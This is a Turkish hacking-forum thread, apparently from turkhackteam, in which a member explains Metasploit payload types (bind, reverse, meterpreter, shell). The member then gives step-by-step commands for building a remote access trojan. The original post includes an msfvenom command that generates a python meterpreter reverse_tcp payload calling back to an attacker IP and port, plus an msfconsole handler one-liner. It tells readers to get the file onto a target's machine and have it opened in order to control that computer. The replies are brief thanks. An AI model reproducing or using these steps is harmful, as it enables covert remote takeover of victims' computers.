İPUCU

Siber Güvenlik Siber Güvenlik ile alakalı araçların kullanımı, bilgi paylaşımı ve siber güvenlik eğitimi ile ilgili kaynakların paylaşıldığı alanımızdır.

Seçenekler

Payload Nedir? //Stajyer\\

Belvando - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
06/2017
Nereden:
Mantı V2
Mesajlar:
239
Konular:
34
Teşekkür (Etti):
59
Teşekkür (Aldı):
201
Ticaret:
(0) %
28-06-2017 13:33
#1
Payload Nedir? //Stajyer\\
Arkadaşlar Merhaba

Bugün sizlere payload nedir nasıl kullanılır ve çeşitleri nelerdir sorularına cevap niteliğinde bir konu anlatımı yapacağım.


Payload nedir?
Hedef sisteme exploit doğru bir şekilde uygulandıktan sonra hedefe yollanıp çalıştırılaması istenen modüle verilen addır.
Bu modül aracılığı ile karşı taraf ile bağlantımız sağlanmış olup girmemiz gereken komutları bizden bekler ve kendisi aracılığı ile açmış olduğumuz servise gönderir ve karşı tarafta çalışmasını sağlar.



Payload Ayrımı

Eğer métasploitin bulunduğu dosya dizinine bakarsanız payloadların bizim ilk olarak görmediğimiz kısımları görebiliriz.




Singles Payload

Adındanda anlaşılacağı üzere bu payloadlar kendi başlarına işlerini halledebilirler.
Diğer payloadlar başka gereksinimleri olurken bunların sadece kendi başlarına çalışılcağı anlatılmıştır.
Ve farkederseniz bu payloadların sadece baş kısmında / bulunur oda işletim sistemini belirtmek içindir.





Stagers Payload

Bu payloadlar çalışmak için zorunlu olarak bir platform isterler. Örn: meterpreter, shell
Ve bunlar tek başlarına çalışamadığından dolayı başka yerlerden dosyalarını alırlar, bu yüzdende boyutları singles payloadlara oranla daha küçüktür.




Soldaki Stragers payload sağdaki ise Singles paylaod.
Ve tabikide payloadların içerisinde 2 tane / bulunur ilk kısım işletim sistemini belirtirken, ikinci kısım oynatılcak platformu gösterir.




Métasploitte payloadlara bakarken bu payloadların farkını şöyle görebiliriz.



Kırmızı ile işaretlediğim yerlerde platformu ayırmamışlar ve buda onun Singles payload olduğunu gösterir.
Yeşil ile işaretlediğim yerlerde platform / ile ayrılmış buda kendisini Stagers payload olduğunu çıkartır.


Stages Payload

Stagers payloadlar çalışmak için belli bir platform isterler.
Bu platformuda Stages payloadlar karşılar.

Tabi siz bu dosyalara baktığınızda reverse, bind gibi dosyalarala karşılaşmıyacaksınız.





Payloadlarda Cevap Alma Çeşitleri

Hedef cihaza sızabilmek için payloadımızı gönerip etkinleştirebilmemiz gerekmekte.
Bu etkinleştirmeler ikiye ayrılıyor.



Bind Payload

Karşı tarafta belli bir açık port vardır.
Ve bu portu kullanarak karşı tarafa dosya yönlendirilir ve kendi seçtiğimiz portumuzla ve karşı tarafın portuyla iletişime geçilir.

Bunun sonucunda karşı tarafın port nekadar bize bilgi vermek için çalışsada kendi portunu erişilmez kılar ve bu bizim için gizliliği yitiren bir haraket olur.
Ancak bundaki etkileşim diğer seçeneğe oranla daha hızlıdır.

Çünkü: Karşı taraftan belli bir gönderi beklemek zorunda değiliz ve dosyayı yolladığımız gibi açılacaktır.



Bir bind payloadın kullanıldıktan sonraki çıktısı böyledir.


Reverse Payload

Muhtemelen ilk bu işlere girdiğinizde kullandığınız ilk payload türü olacaktır.
Karşı tarafa herhangi bir iletişim aracılığı
(Flash bellek, Servis açığı vb.) ile gönderilerek çalışması beklenir.
Bu işlemler olurken saldırganda arkadan bu geri dönüşü yakalamak için bir handler çalıştırılır(multi/handler).
Geri dönüş yapılmadığı ve kapatılmadığı sürece beklemede kalır.
Genelde sosyal mühendislik saldırılarında karşılaşılır bu yöntem.
Bind payloadda olduğu gibi hedefin belli bir portundan cevap beklemez ve bizim ayarladığımız portumuza düşer.
Böylece herhangi bir servis kesilmesi söz konusu olmaz.
Ama diğerine oranla daha yavaş gerçekleşir.
Çünkü: Karşı taraf dosyayı kendisi çalıştırana dek bekler.



Bir reverse payload kullanımından sonraki çıktı böyle olur.



Payload Türleri


Tüm payloadların belli bir çalışma mantığı olduğu gibi belli birde kullanımı vardır.
(Burada ikiden fazla payload türü bulunur ancak ben sizin en çok kullanıcağınız 2 tanesini aldım)

Meterpreter Payload

Bu payload çeşidimiz bir dll injection çeşidi olup RAM üzerinde çalışır.
RAM üzerinde çalıştığından ötürü hiç bir şekilde kalıntı bırakmaz.
Ancak bilgisayar kapatılıp açıldığında bağlantınızı yeniden tazelemeniz gerekecektir.
Size shell payloadından daha fazla seçenek sunup daha kullanışlıdır.



Shell Payload

Shell payload size cihazın konsoluna erişim hakkı sağlar.
Ayriyetten başka bir özelliği de yoktur.



Payload ile RAT Hazırlama

RAT nedir?
Uzun hali Remote Access Trojan olan, karşı tarafa erişim sağlayıp istediklerimizi yapmamızı sağlayan virus çeşididir.

Métasploitimizin içinde gelen payloadlarla rahatlıkla bir RAT oluşturabiliriz.
Bunun için msfvenom aracını kullanabiliriz.

msfvenom aracı aslında ilk zamanlarda olmayıp msfpayload ve msfencoder araçlarının karışımıyla oluşmuştur.
Ozaman hazırlamaya başlayalım.
msfvenom -p python/meterpreter/reverse_tcp lhost=192.168.1.25 lport=4444 R > Masaüstü/RAT.py



Açıklamalar:
-p parametresi payload seçmek istiyorum anlamına gelmekte.
python/meterpreter/reverse_tcp seçilen payload.
python kısmına başka sistemlerde eklenebilir.[android, cmd, firefox, java, linux, osx, php, ruby, windows]
meterpreter kısmı payloadımızın türüdür.[shell, meterpreter vs.]
reverse_tcp kısmı bağlantı şeklidir. [reverse_http, reverse_ipv6_tcp]
lhost ile kendi ip adresimizi belirliyoruz.
lport ile kendi istediğimiz portu belirliyoruz
R ile bu RAT dosyasının kodlarını konsola basmasını söylüyoruz.
> Masaüstü/RAT.py kısmı çıkan çıktıyı şuraya şöyle kaydet olarak belirliyoruz.


Evet yaptığımız RAT masaüstüne geldi.
Biz bunu bir yolunu bulup hedefe atmamız lazım.
Ancak bundan önce métasploitte handler çalıştıralım ki gelen bağlantıyı tutabilelim.

msfconsole -x "use multi/handler; set payload python/meterpreter/reverse_tcp; set lhost 192.168.1.25; set lport 4444; exploit"



Böyle yaparak tek komutla handlerimizi başlattık.
Şimdi tek yapılması gereken oluşturduğumuz RAT dosyasının açılması.



Evet böylecede karşı tarafa RATımızı yedirmeyi başardık ve bilgisayarını kontrol edebiliriz.

Okuduğunuz için teşşekkür ederim
Eğer beğendiseniz teşşekkür atmayı unutmayın.
Diğer konularıma burdan ulaşabilirsiniz:
http://www.turkhackteam.org/search.p...rchid=10446642

HEPİNİZ USTA BİR HACKERSINIZ, TABİ ÖĞRENMEK İSTERSENİZ.


---------------------
Bastığın yerleri 'toprak' diyerek geçme, tanı!
Düşün altındaki binlerce kefensiz yatanı.
Sen şehit oğlusun, incitme, yazıktır atanı;
Verme, dünyaları alsan da bu cennet vatanı.
Telegram: @belvando
_MaC_, ilkbey43, ByTurko turk Teşekkür etti.
_MaC_ - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
12/2009
Nereden:
Bilinmezden
Mesajlar:
1.362
Konular:
35
Teşekkür (Etti):
136
Teşekkür (Aldı):
149
Ticaret:
(0) %
28-06-2017 13:46
#2
Eline Sağlık. Çok Güzel Anlatım olmuş.
---------------------
01:10:11:01:01:10:00:01:01:10:00:11

2009-2018
ilkbey43 Teşekkür etti.
HocaXD - ait Kullanıcı Resmi (Avatar)
E-Mail onayı yapılmamış üye
Üyelik tarihi:
03/2017
Nereden:
Roma
Mesajlar:
1.873
Konular:
95
Teşekkür (Etti):
12
Teşekkür (Aldı):
271
Ticaret:
(0) %
28-06-2017 13:55
#3
Güzel konu ellerine sağlık.
D4D4S - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
03/2017
Mesajlar:
859
Konular:
36
Teşekkür (Etti):
426
Teşekkür (Aldı):
121
Ticaret:
(0) %
28-06-2017 13:56
#4
Ellerine sağlık
---------------------
☾☆

◥◣◥◣【 D4D4S 】◥◣◥◣
MyGf - ait Kullanıcı Resmi (Avatar)
Researcher
Üyelik tarihi:
07/2016
Nereden:
Hall of Fame
Mesajlar:
3.282
Konular:
315
Teşekkür (Etti):
512
Teşekkür (Aldı):
1290
Ticaret:
(0) %
28-06-2017 13:57
#5
Ellerine sağlık.
Epesus - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
02/2016
Nereden:
Boşver !
Yaş:
20
Mesajlar:
653
Konular:
120
Teşekkür (Etti):
1350
Teşekkür (Aldı):
270
Ticaret:
(0) %
04-07-2017 14:04
#6
güzel anlatım
Sprachlos - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
09/2016
Nereden:
/etc/shadow
Mesajlar:
3.815
Konular:
213
Teşekkür (Etti):
22
Teşekkür (Aldı):
616
Ticaret:
(0) %
04-07-2017 14:08
#7
Eline sağlık teşekkürler dostum.
---------------------
Eski Saldırı Timi Üyesi


sprach.ρнρ

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı